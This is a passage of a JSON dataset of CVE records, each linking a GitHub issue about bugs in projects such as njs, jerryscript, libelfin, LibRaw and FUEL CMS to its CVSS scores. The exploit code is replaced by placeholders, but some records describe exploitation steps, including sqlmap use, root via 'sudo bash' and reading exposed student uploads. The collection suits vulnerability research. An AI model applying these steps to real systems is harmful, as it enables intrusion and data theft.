  57063. "Repo_new": "purple-wl/discourse-sending-email-function-exist-server-side-request-forgery-ssrf-",
  57064. "Issue_Created_At": "2020-08-12T07:04:02Z",
  57065. "description": "exploitation of vulnerability . APITAG send a new email FILETAG APITAG to upload images from a website FILETAG NUMBERTAG send mail FILETAG APITAG email has been sent. FILETAG APITAG remote server received a GET request from the site\uff01 FILETAG",
  57066. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
  57067. "severity": "MEDIUM",
  57068. "baseScore": 5.3,
  57069. "impactScore": 1.4,
  57070. "exploitabilityScore": 3.9
  57071. },
  57072. {
  57073. "CVE_ID": "CVE-2020-24343",
  57074. "Issue_Url_old": "https://github.com/ccxvii/mujs/issues/136",
  57075. "Issue_Url_new": "https://github.com/ccxvii/mujs/issues/136",
  57076. "Repo_new": "ccxvii/mujs",
  57077. "Issue_Created_At": "2020-06-28T19:13:31Z",
  57078. "description": "APITAG heap use after free PATHTAG in APITAG git hash: APITAG cmd: APITAG POC: ERRORTAG Stack dump: ERRORTAG",
  57079. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  57080. "severity": "HIGH",
  57081. "baseScore": 7.8,
  57082. "impactScore": 5.9,
  57083. "exploitabilityScore": 1.8
  57084. },
  57085. {
  57086. "CVE_ID": "CVE-2020-24344",
  57087. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/3976",
  57088. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/3976",
  57089. "Repo_new": "jerryscript-project/jerryscript",
  57090. "Issue_Created_At": "2020-07-05T20:43:50Z",
  57091. "description": "Heap overflow in jerry core. APITAG revision git hash: APITAG Test case ERRORTAG In debug build, it triggers an assertion 'scope_stack_p > context_p >scope_stack_p' failed Execution steps ./jerry FILETAG Build cmd python tools/build.py compile flag=\" fsanitize=address\" Stack dump: ERRORTAG",
  57092. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  57093. "severity": "HIGH",
  57094. "baseScore": 7.1,
  57095. "impactScore": 5.2,
  57096. "exploitabilityScore": 1.8
  57097. },
  57098. {
  57099. "CVE_ID": "CVE-2020-24345",
  57100. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/3977",
  57101. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/3977",
  57102. "Repo_new": "jerryscript-project/jerryscript",
  57103. "Issue_Created_At": "2020-07-06T05:01:36Z",
  57104. "description": "Stack overflow in ecma_is_lexical_environment. APITAG revision git hash: APITAG Test case ERRORTAG Execution steps ./jerry FILETAG Build cmd python tools/build.py compile flag=\" fsanitize=address\" Stack dump: ERRORTAG",
  57105. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  57106. "severity": "HIGH",
  57107. "baseScore": 7.8,
  57108. "impactScore": 5.9,
  57109. "exploitabilityScore": 1.8
  57110. },
  57111. {
  57112. "CVE_ID": "CVE-2020-24346",
  57113. "Issue_Url_old": "https://github.com/nginx/njs/issues/325",
  57114. "Issue_Url_new": "https://github.com/nginx/njs/issues/325",
  57115. "Repo_new": "nginx/njs",
  57116. "Issue_Created_At": "2020-06-28T18:40:42Z",
  57117. "description": "heap use after free in njs_json_parse_iterator_call. Version: APITAG , git commit APITAG POC: ERRORTAG cmd: APITAG Stack dump: ERRORTAG",
  57118. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  57119. "severity": "HIGH",
  57120. "baseScore": 7.8,
  57121. "impactScore": 5.9,
  57122. "exploitabilityScore": 1.8
  57123. },
  57124. {
  57125. "CVE_ID": "CVE-2020-24347",
  57126. "Issue_Url_old": "https://github.com/nginx/njs/issues/323",
  57127. "Issue_Url_new": "https://github.com/nginx/njs/issues/323",
  57128. "Repo_new": "nginx/njs",
  57129. "Issue_Created_At": "2020-06-27T19:58:35Z",
  57130. "description": "Segfault in njs_lvlhsh_bucket_find. Version: APITAG , git commit APITAG POC: ERRORTAG cmd: APITAG Stack dump: ERRORTAG",
  57131. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  57132. "severity": "MEDIUM",
  57133. "baseScore": 5.5,
  57134. "impactScore": 3.6,
  57135. "exploitabilityScore": 1.8
  57136. },
  57137. {
  57138. "CVE_ID": "CVE-2020-24348",
  57139. "Issue_Url_old": "https://github.com/nginx/njs/issues/322",
  57140. "Issue_Url_new": "https://github.com/nginx/njs/issues/322",
  57141. "Repo_new": "nginx/njs",
  57142. "Issue_Created_At": "2020-06-27T19:55:59Z",
  57143. "description": "Segfault in njs_json_stringify_iterator. Version: APITAG , git commit APITAG POC: CODETAG cmd: APITAG Stack dump: ERRORTAG",
  57144. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  57145. "severity": "MEDIUM",
  57146. "baseScore": 5.5,
  57147. "impactScore": 3.6,
  57148. "exploitabilityScore": 1.8
  57149. },
  57150. {
  57151. "CVE_ID": "CVE-2020-24349",
  57152. "Issue_Url_old": "https://github.com/nginx/njs/issues/324",
  57153. "Issue_Url_new": "https://github.com/nginx/njs/issues/324",
  57154. "Repo_new": "nginx/njs",
  57155. "Issue_Created_At": "2020-06-27T20:07:39Z",
  57156. "description": "Control flow hijack in njs_value_property. Version: APITAG , git commit APITAG This bug is likely exploitable. POC: ERRORTAG cmd: APITAG Stack dump: ERRORTAG",
  57157. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
  57158. "severity": "MEDIUM",
  57159. "baseScore": 5.5,
  57160. "impactScore": 3.6,
  57161. "exploitabilityScore": 1.8
  57162. },
  57163. {
  57164. "CVE_ID": "CVE-2020-24368",
  57165. "Issue_Url_old": "https://github.com/Icinga/icingaweb2/issues/4226",
  57166. "Issue_Url_new": "https://github.com/icinga/icingaweb2/issues/4226",
  57167. "Repo_new": "icinga/icingaweb2",
  57168. "Issue_Created_At": "2020-08-14T12:33:43Z",
  57169. "description": "Placeholder.",
  57170. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  57171. "severity": "HIGH",
  57172. "baseScore": 7.5,
  57173. "impactScore": 3.6,
  57174. "exploitabilityScore": 3.9
  57175. },
  57176. {
  57177. "CVE_ID": "CVE-2020-24372",
  57178. "Issue_Url_old": "https://github.com/LuaJIT/LuaJIT/issues/603",
  57179. "Issue_Url_new": "https://github.com/luajit/luajit/issues/603",
  57180. "Repo_new": "luajit/luajit",
  57181. "Issue_Created_At": "2020-07-14T01:15:30Z",
  57182. "description": "Second segfault in lj_err_run. Hi, we found a crash in APITAG Version NUMBERTAG Git hash: APITAG POC: ERRORTAG Stack dump: ERRORTAG",
  57183. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  57184. "severity": "HIGH",
  57185. "baseScore": 7.5,
  57186. "impactScore": 3.6,
  57187. "exploitabilityScore": 3.9
  57188. },
  57189. {
  57190. "CVE_ID": "CVE-2020-24381",
  57191. "Issue_Url_old": "https://github.com/gunet/openeclass/issues/39",
  57192. "Issue_Url_new": "https://github.com/gunet/openeclass/issues/39",
  57193. "Repo_new": "gunet/openeclass",
  57194. "Issue_Created_At": "2020-08-17T16:03:50Z",
  57195. "description": "Improper Access Control by Directory Listing Misconfiguration. Improper Access Control by Directory Listing Misconfiguration that affects all versions When the webapp is poorly configured (directory listing is enabled), an unauthenticated user will be able to view and download students' uploaded assessments. APITAG Course link URLTAG Add \"work\" directory at the end URLTAG",
  57196. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  57197. "severity": "HIGH",
  57198. "baseScore": 7.5,
  57199. "impactScore": 3.6,
  57200. "exploitabilityScore": 3.9
  57201. },
  57202. {
  57203. "CVE_ID": "CVE-2020-24391",
  57204. "Issue_Url_old": "https://github.com/mongodb-js/query-parser/issues/16",
  57205. "Issue_Url_new": "https://github.com/mongodb-js/query-parser/issues/16",
  57206. "Repo_new": "mongodb-js/query-parser",
  57207. "Issue_Created_At": "2020-01-07T06:21:42Z",
  57208. "description": "Migrate to vm2 instead of safer eval. Hi! safer eval URLTAG is now considered unsafe. A safer option would be vm2 URLTAG . This only requires changes in APITAG which shouldn't be too bad. I'm trying to get a PR up in the next two weeks.",
  57209. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  57210. "severity": "CRITICAL",
  57211. "baseScore": 9.8,
  57212. "impactScore": 5.9,
  57213. "exploitabilityScore": 3.9
  57214. },
  57215. {
  57216. "CVE_ID": "CVE-2020-24566",
  57217. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/6564",
  57218. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/6564",
  57219. "Repo_new": "octopusdeploy/issues",
  57220. "Issue_Created_At": "2020-09-08T03:44:23Z",
  57221. "description": "Passwords written to deployment log in plain text NUMBERTAG also affected APITAG . The fix has been shipped in the patch indicated by the milestone. If you are using APITAG we highly recommend applying this patch. Learn about Releases of Octopus Deploy Server URLTAG .",
  57222. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  57223. "severity": "HIGH",
  57224. "baseScore": 7.5,
  57225. "impactScore": 3.6,
  57226. "exploitabilityScore": 3.9
  57227. },
  57228. {
  57229. "CVE_ID": "CVE-2020-24566",
  57230. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/6563",
  57231. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/6563",
  57232. "Repo_new": "octopusdeploy/issues",
  57233. "Issue_Created_At": "2020-09-08T03:28:35Z",
  57234. "description": "Passwords written to deployment log in plain text. Description APITAG A regression was introduced that caused certain passwords to be written to the deployment log without being masked. This only affects deployment processes that ran steps on the server/worker (not on targets). Affected versions APITAG Octopus Server NUMBERTAG Links CVE: CVETAG URLTAG Internal issue: URLTAG",
  57235. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  57236. "severity": "HIGH",
  57237. "baseScore": 7.5,
  57238. "impactScore": 3.6,
  57239. "exploitabilityScore": 3.9
  57240. },
  57241. {
  57242. "CVE_ID": "CVE-2020-24574",
  57243. "Issue_Url_old": "https://github.com/jtesta/gog_galaxy_client_service_poc/issues/1",
  57244. "Issue_Url_new": "https://github.com/jtesta/gog_galaxy_client_service_poc/issues/1",
  57245. "Repo_new": "jtesta/gog_galaxy_client_service_poc",
  57246. "Issue_Created_At": "2021-01-22T23:22:15Z",
  57247. "description": "APITAG status update. APITAG in case anyone was wondering, the APITAG still works on GOG Galaxy NUMBERTAG last tested as of time of writing this). Just compiled and tested it and was able to create a local user and add them to the local administrators group on a testbed system. GOG has yet to fix the underlying issue, it seems. CVETAG is alive and well, yet.",
  57248. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  57249. "severity": "HIGH",
  57250. "baseScore": 7.8,
  57251. "impactScore": 5.9,
  57252. "exploitabilityScore": 1.8
  57253. },
  57254. {
  57255. "CVE_ID": "CVE-2020-24616",
  57256. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2814",
  57257. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2814",
  57258. "Repo_new": "fasterxml/jackson-databind",
  57259. "Issue_Created_At": "2020-08-11T02:05:43Z",
  57260. "description": "Block one more gadget type (xxx, CVE xxxx xxx). (placeholder until investigated, evaluated, fixed) Another gadget type(s) reported regarding class(es) of [TO BE ADDED]. library. See URLTAG for description of the general problem. Mitre id: [to be allocated] Reporter(s): [to be added] Fix will likely be included in NUMBERTAG Not considered valid CVE for Jackson NUMBERTAG and later (see URLTAG",
  57261. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  57262. "severity": "HIGH",
  57263. "baseScore": 8.1,
  57264. "impactScore": 5.9,
  57265. "exploitabilityScore": 2.2
  57266. },
  57267. {
  57268. "CVE_ID": "CVE-2020-24740",
  57269. "Issue_Url_old": "https://github.com/pluck-cms/pluck/issues/81",
  57270. "Issue_Url_new": "https://github.com/pluck-cms/pluck/issues/81",
  57271. "Repo_new": "pluck-cms/pluck",
  57272. "Issue_Created_At": "2019-10-21T08:14:08Z",
  57273. "description": "An issue was discovered in Pluck NUMBERTAG de NUMBERTAG There is a CSRF vulnerability that can editpage via a APITAG CSRF POC: CODETAG FILETAG",
  57274. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
  57275. "severity": "MEDIUM",
  57276. "baseScore": 4.3,
  57277. "impactScore": 1.4,
  57278. "exploitabilityScore": 2.8
  57279. },
  57280. {
  57281. "CVE_ID": "CVE-2020-24750",
  57282. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2798",
  57283. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2798",
  57284. "Repo_new": "fasterxml/jackson-databind",
  57285. "Issue_Created_At": "2020-07-16T17:25:52Z",
  57286. "description": "Block one more gadget type (xxx, CVE xxxx xxx). (placeholder until investigated, evaluated, fixed) Another gadget type(s) reported regarding class(es) of [TO BE ADDED]. library. See URLTAG for description of the general problem. Mitre id: [to be allocated] Reporter(s): [to be added] Fix will likely be included in NUMBERTAG Not considered valid CVE for Jackson NUMBERTAG and later (see URLTAG",
  57287. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  57288. "severity": "HIGH",
  57289. "baseScore": 8.1,
  57290. "impactScore": 5.9,
  57291. "exploitabilityScore": 2.2
  57292. },
  57293. {
  57294. "CVE_ID": "CVE-2020-24772",
  57295. "Issue_Url_old": "https://github.com/Dreamacro/clash/issues/910",
  57296. "Issue_Url_new": "https://github.com/dreamacro/clash/issues/910",
  57297. "Repo_new": "dreamacro/clash",
  57298. "Issue_Created_At": "2020-08-20T07:44:10Z",
  57299. "description": "FILETAG APITAG FILETAG \u53ef\u80fd\u7684\u89e3\u51b3\u65b9\u6848 Possible Solution Limit http or https to get configuration files \u66f4\u591a\u4fe1\u606f APITAG CVETAG \u6f0f\u6d1e \u7c7b\u4f3c URLTAG \u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u7cbe\u5fc3\u6784\u9020\u7684iframe APITAG \u4f8b\u5982 ( APITAG APITAG ) \u5e76\u8bbf\u95ee\u6307\u5b9aSMB\u670d\u52a1\u5668 APITAG \u8bbf\u95ee\u653b\u51fb\u8005\u6784\u9020SMB\u7684\u670d\u52a1\u5668\u83b7\u53d6\u914d\u7f6e\u6587\u4ef6\u65f6 Windows\u4f1a\u8fdb\u884cNTLM\u8ba4\u8bc1 \u53d1\u9001NTLM\u54c8\u5e0c\u5230\u653b\u51fb\u8005\u7684\u670d\u52a1\u5668 \u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528NTLM\u54c8\u5e0c\u8fdb\u884c\u7528\u6237\u5bc6\u7801\u7834\u89e3\u7b49\u64cd\u4f5c \u8be5\u6f0f\u6d1e\u6709\u4e00\u5b9a\u7684\u5371\u5bb3\u6027",
  57300. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  57301. "severity": "HIGH",
  57302. "baseScore": 8.8,
  57303. "impactScore": 5.9,
  57304. "exploitabilityScore": 2.8
  57305. },
  57306. {
  57307. "CVE_ID": "CVE-2020-24791",
  57308. "Issue_Url_old": "https://github.com/daylightstudio/FUEL-CMS/issues/561",
  57309. "Issue_Url_new": "https://github.com/daylightstudio/fuel-cms/issues/561",
  57310. "Repo_new": "daylightstudio/fuel-cms",
  57311. "Issue_Created_At": "2020-08-19T08:22:40Z",
  57312. "description": "FUEL CMS NUMBERTAG allows SQL Injection via parameter 'fuel_replace_id' in PATHTAG FUEL CMS NUMBERTAG allows SQL Injection via parameter 'fuel_replace_id' in PATHTAG Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. POC: ERRORTAG Exploiting Step1. Burpsuite request payload: ERRORTAG Exploiting Step2 use sqlmap and exploit it. APITAG APITAG APITAG",
  57313. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  57314. "severity": "CRITICAL",
  57315. "baseScore": 9.8,
  57316. "impactScore": 5.9,
  57317. "exploitabilityScore": 3.9
  57318. },
  57319. {
  57320. "CVE_ID": "CVE-2020-24821",
  57321. "Issue_Url_old": "https://github.com/aclements/libelfin/issues/52",
  57322. "Issue_Url_new": "https://github.com/aclements/libelfin/issues/52",
  57323. "Repo_new": "aclements/libelfin",
  57324. "Issue_Created_At": "2020-08-15T13:18:45Z",
  57325. "description": "SEGV in function dwarf::cursor::skip_form at APITAG Tested in Ubuntu NUMBERTAG bit. The tested program is the example program dump tree. The testcase is dump_tree_seg NUMBERTAG CVETAG . I use the following command: APITAG and get: APITAG I use valgrind to analysis the bug and get the below information (absolute path information omitted): ERRORTAG I use APITAG to build ffjpeg and running it with the following command: APITAG This is the ASAN information (absolute path information omitted): ERRORTAG An attacker can exploit this vulnerability by submitting a malicious elf file that exploits this bug which will result in a Denial of Service APITAG even buffer overflow.",
  57326. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  57327. "severity": "MEDIUM",
  57328. "baseScore": 5.5,
  57329. "impactScore": 3.6,
  57330. "exploitabilityScore": 1.8
  57331. },
  57332. {
  57333. "CVE_ID": "CVE-2020-24822",
  57334. "Issue_Url_old": "https://github.com/aclements/libelfin/issues/50",
  57335. "Issue_Url_new": "https://github.com/aclements/libelfin/issues/50",
  57336. "Repo_new": "aclements/libelfin",
  57337. "Issue_Created_At": "2020-08-15T13:16:38Z",
  57338. "description": "SEGV in function dwarf::cursor::uleb NUMBERTAG at APITAG Tested in Ubuntu NUMBERTAG bit. The tested program is the example program dump tree. The testcase is dump_tree_segv CVETAG . I use the following command: APITAG and get: APITAG I use valgrind to analysis the bug and get the below information (absolute path information omitted): ERRORTAG I use APITAG to build ffjpeg and running it with the following command: APITAG This is the ASAN information (absolute path information omitted): ERRORTAG An attacker can exploit this vulnerability by submitting a malicious elf file that exploits this bug which will result in a Denial of Service APITAG even buffer overflow.",
  57339. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  57340. "severity": "MEDIUM",
  57341. "baseScore": 5.5,
  57342. "impactScore": 3.6,
  57343. "exploitabilityScore": 1.8
  57344. },
  57345. {
  57346. "CVE_ID": "CVE-2020-24823",
  57347. "Issue_Url_old": "https://github.com/aclements/libelfin/issues/51",
  57348. "Issue_Url_new": "https://github.com/aclements/libelfin/issues/51",
  57349. "Repo_new": "aclements/libelfin",
  57350. "Issue_Created_At": "2020-08-15T13:17:23Z",
  57351. "description": "SEGV in function dwarf::to_string at APITAG Tested in Ubuntu NUMBERTAG bit. The tested program is the example program dump tree. The testcase is dump_tree_seg NUMBERTAG CVETAG . I use the following command: APITAG and get: APITAG I use valgrind to analysis the bug and get the below information (absolute path information omitted): ERRORTAG I use APITAG to build ffjpeg and running it with the following command: APITAG This is the ASAN information (absolute path information omitted): ERRORTAG An attacker can exploit this vulnerability by submitting a malicious elf file that exploits this bug which will result in a Denial of Service APITAG even buffer overflow.",
  57352. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  57353. "severity": "MEDIUM",
  57354. "baseScore": 5.5,
  57355. "impactScore": 3.6,
  57356. "exploitabilityScore": 1.8
  57357. },
  57358. {
  57359. "CVE_ID": "CVE-2020-24824",
  57360. "Issue_Url_old": "https://github.com/aclements/libelfin/issues/48",
  57361. "Issue_Url_new": "https://github.com/aclements/libelfin/issues/48",
  57362. "Repo_new": "aclements/libelfin",
  57363. "Issue_Created_At": "2020-08-15T13:10:45Z",
  57364. "description": "Global Buffer Overflow in function dwarf::line_table::line_table at APITAG Tested in Ubuntu NUMBERTAG bit. The tested program is the example program dump_line. The testcase is APITAG CVETAG . I use the following command: APITAG and get: ERRORTAG I use valgrind to analysis the bug and get the below information (absolute path information omitted): ERRORTAG I use APITAG to build ffjpeg and running it with the following command: APITAG This is the ASAN information (absolute path information omitted): ERRORTAG An attacker can exploit this vulnerability by submitting a malicious elf file that exploits this bug which will result in a Denial of Service APITAG even buffer overflow.",
  57365. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  57366. "severity": "MEDIUM",
  57367. "baseScore": 5.5,
  57368. "impactScore": 3.6,
  57369. "exploitabilityScore": 1.8
  57370. },
  57371. {
  57372. "CVE_ID": "CVE-2020-24825",
  57373. "Issue_Url_old": "https://github.com/aclements/libelfin/issues/46",
  57374. "Issue_Url_new": "https://github.com/aclements/libelfin/issues/46",
  57375. "Repo_new": "aclements/libelfin",
  57376. "Issue_Created_At": "2020-08-15T13:07:30Z",
  57377. "description": "SEGV in function line_table::line_table at APITAG Tested in Ubuntu NUMBERTAG bit. The testcase is dump_line_segv CVETAG . I use the following command: APITAG and got: APITAG I use valgrind to analysis the bug and get the below information (absolute path information omitted): ERRORTAG I use APITAG to build ffjpeg and running it with the following command: APITAG This is the ASAN information (absolute path information omitted): ERRORTAG An attacker can exploit this vulnerability by submitting a malicious elf file that exploits this bug which will result in a Denial of Service APITAG",
  57378. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  57379. "severity": "MEDIUM",
  57380. "baseScore": 5.5,
  57381. "impactScore": 3.6,
  57382. "exploitabilityScore": 1.8
  57383. },
  57384. {
  57385. "CVE_ID": "CVE-2020-24826",
  57386. "Issue_Url_old": "https://github.com/aclements/libelfin/issues/49",
  57387. "Issue_Url_new": "https://github.com/aclements/libelfin/issues/49",
  57388. "Repo_new": "aclements/libelfin",
  57389. "Issue_Created_At": "2020-08-15T13:15:40Z",
  57390. "description": "SEGV in function elf::section::as_strtab at APITAG Tested in Ubuntu NUMBERTAG bit. The tested program is the example program dump syms. The testcase is dump_syms_segv CVETAG . I use the following command: APITAG and get: APITAG I use valgrind to analysis the bug and get the below information (absolute path information omitted): ERRORTAG I use APITAG to build ffjpeg and running it with the following command: APITAG This is the ASAN information (absolute path information omitted): ERRORTAG An attacker can exploit this vulnerability by submitting a malicious elf file that exploits this bug which will result in a Denial of Service APITAG even buffer overflow.",
  57391. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  57392. "severity": "MEDIUM",
  57393. "baseScore": 5.5,
  57394. "impactScore": 3.6,
  57395. "exploitabilityScore": 1.8
  57396. },
  57397. {
  57398. "CVE_ID": "CVE-2020-24827",
  57399. "Issue_Url_old": "https://github.com/aclements/libelfin/issues/47",
  57400. "Issue_Url_new": "https://github.com/aclements/libelfin/issues/47",
  57401. "Repo_new": "aclements/libelfin",
  57402. "Issue_Created_At": "2020-08-15T13:08:23Z",
  57403. "description": "SEGV in function dwarf::cursor::skip_form at APITAG Tested in Ubuntu NUMBERTAG bit. The testcase is dump_line_seg NUMBERTAG CVETAG . I use the following command: APITAG and got: APITAG I use valgrind to analysis the bug and get the below information (absolute path information omitted): ERRORTAG I use APITAG to build ffjpeg and running it with the following command: APITAG This is the ASAN information (absolute path information omitted): ERRORTAG An attacker can exploit this vulnerability by submitting a malicious elf file that exploits this bug which will result in a Denial of Service APITAG",
  57404. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  57405. "severity": "MEDIUM",
  57406. "baseScore": 5.5,
  57407. "impactScore": 3.6,
  57408. "exploitabilityScore": 1.8
  57409. },
  57410. {
  57411. "CVE_ID": "CVE-2020-24829",
  57412. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1422",
  57413. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1422",
  57414. "Repo_new": "gpac/gpac",
  57415. "Issue_Created_At": "2020-03-01T18:58:01Z",
  57416. "description": "APITAG heap buffer overflow APITAG in gf_m2ts_section_complete. Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Thanks dr3dd",
  57417. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  57418. "severity": "MEDIUM",
  57419. "baseScore": 5.5,
  57420. "impactScore": 3.6,
  57421. "exploitabilityScore": 1.8
  57422. },
  57423. {
  57424. "CVE_ID": "CVE-2020-24847",
  57425. "Issue_Url_old": "https://github.com/xtr4nge/FruityWifi/issues/277",
  57426. "Issue_Url_new": "https://github.com/xtr4nge/fruitywifi/issues/277",
  57427. "Repo_new": "xtr4nge/fruitywifi",
  57428. "Issue_Created_At": "2020-10-02T18:17:30Z",
  57429. "description": "Cross Site Request Forgery in APITAG NUMBERTAG ulnerability Description During the analysis of the product, it was observed that APITAG NUMBERTAG is vulnerable to Cross Site Request Forgery (CSRF) due to lack of CSRF protection in the APITAG endpoint. This allows an unauthenticated attacker to lure the victim to visit a website containing a CSRF Page resulting in the change of APITAG and APITAG value as per the attacker's choice. Steps to Reproduce NUMBERTAG Generate an HTML Proof of Concept with the below content. CODETAG NUMBERTAG Once the victim will open this HTML file, a CSRF request will be triggered to the legitimate server allowing the change of APITAG and hostapd_wpa_passphrase .",
  57430. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
  57431. "severity": "MEDIUM",
  57432. "baseScore": 4.3,
  57433. "impactScore": 1.4,
  57434. "exploitabilityScore": 2.8
  57435. },
  57436. {
  57437. "CVE_ID": "CVE-2020-24848",
  57438. "Issue_Url_old": "https://github.com/xtr4nge/FruityWifi/issues/278",
  57439. "Issue_Url_new": "https://github.com/xtr4nge/fruitywifi/issues/278",
  57440. "Repo_new": "xtr4nge/fruitywifi",
  57441. "Issue_Created_At": "2020-10-02T18:22:50Z",
  57442. "description": "Privilege Escalation via excessive SUDOER Permission in APITAG NUMBERTAG Description During the analysis, it was observed that it is possible to abuse the Sudoer permissions of the software to perform a Privilege Escalation attack. An attacker with fruitywifi user privileges would be able to exploit the issue NUMBERTAG and can gain complete root access by executing commands as the superuser. Since the software has excessive sudo rights defined, it is possible to simply elevate the privileges without supplying any password by performing a simple command sudo bash .",
  57443. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  57444. "severity": "HIGH",
  57445. "baseScore": 7.8,
  57446. "impactScore": 5.9,
  57447. "exploitabilityScore": 1.8
  57448. },
  57449. {
  57450. "CVE_ID": "CVE-2020-24870",
  57451. "Issue_Url_old": "https://github.com/LibRaw/LibRaw/issues/330",
  57452. "Issue_Url_new": "https://github.com/libraw/libraw/issues/330",
  57453. "Repo_new": "libraw/libraw",
  57454. "Issue_Created_At": "2020-08-19T02:03:53Z",
  57455. "description": "stack buffer overflow in APITAG in APITAG poc: FILETAG reproduce steps NUMBERTAG compile libraw with Address sanitizer NUMBERTAG run command dcraw_emu APITAG result: ERRORTAG",
  57456. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  57457. "severity": "HIGH",
  57458. "baseScore": 8.8,
  57459. "impactScore": 5.9,
  57460. "exploitabilityScore": 2.8
  57461. },
  57462. {
  57463. "CVE_ID": "CVE-2020-24877",
  57464. "Issue_Url_old": "https://github.com/h4ckdepy/zzzphp/issues/1",
  57465. "Issue_Url_new": "https://github.com/h4ckdepy/zzzphp/issues/1",
  57466. "Repo_new": "h4ckdepy/zzzphp",
  57467. "Issue_Created_At": "2020-08-19T09:49:05Z",
  57468. "description": "Vulnerability analysis.",
  57469. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  57470. "severity": "CRITICAL",
  57471. "baseScore": 9.8,
  57472. "impactScore": 5.9,
  57473. "exploitabilityScore": 3.9
  57474. },
  57475. {
  57476. "CVE_ID": "CVE-2020-24889",
  57477. "Issue_Url_old": "https://github.com/LibRaw/LibRaw/issues/334",
  57478. "Issue_Url_new": "https://github.com/libraw/libraw/issues/334",
  57479. "Repo_new": "libraw/libraw",
  57480. "Issue_Created_At": "2020-08-20T11:30:55Z",
  57481. "description": "buffer overflow. Reproduce steps:",
  57482. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  57483. "severity": "HIGH",
  57484. "baseScore": 7.8,
  57485. "impactScore": 5.9,
  57486. "exploitabilityScore": 1.8
  57487. },
  57488. {
  57489. "CVE_ID": "CVE-2020-24890",
  57490. "Issue_Url_old": "https://github.com/LibRaw/LibRaw/issues/335",
  57491. "Issue_Url_new": "https://github.com/libraw/libraw/issues/335",
  57492. "Repo_new": "libraw/libraw",
  57493. "Issue_Created_At": "2020-08-20T12:18:12Z",
  57494. "description": "segmentation fault in APITAG Reproduce steps NUMBERTAG compile provided test.c NUMBERTAG run command: ./test poc Stack trace: ERRORTAG Poc: FILETAG",
  57495. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  57496. "severity": "MEDIUM",
  57497. "baseScore": 5.5,
  57498. "impactScore": 3.6,
  57499. "exploitabilityScore": 1.8
  57500. },
  57501. {
  57502. "CVE_ID": "CVE-2020-24930",
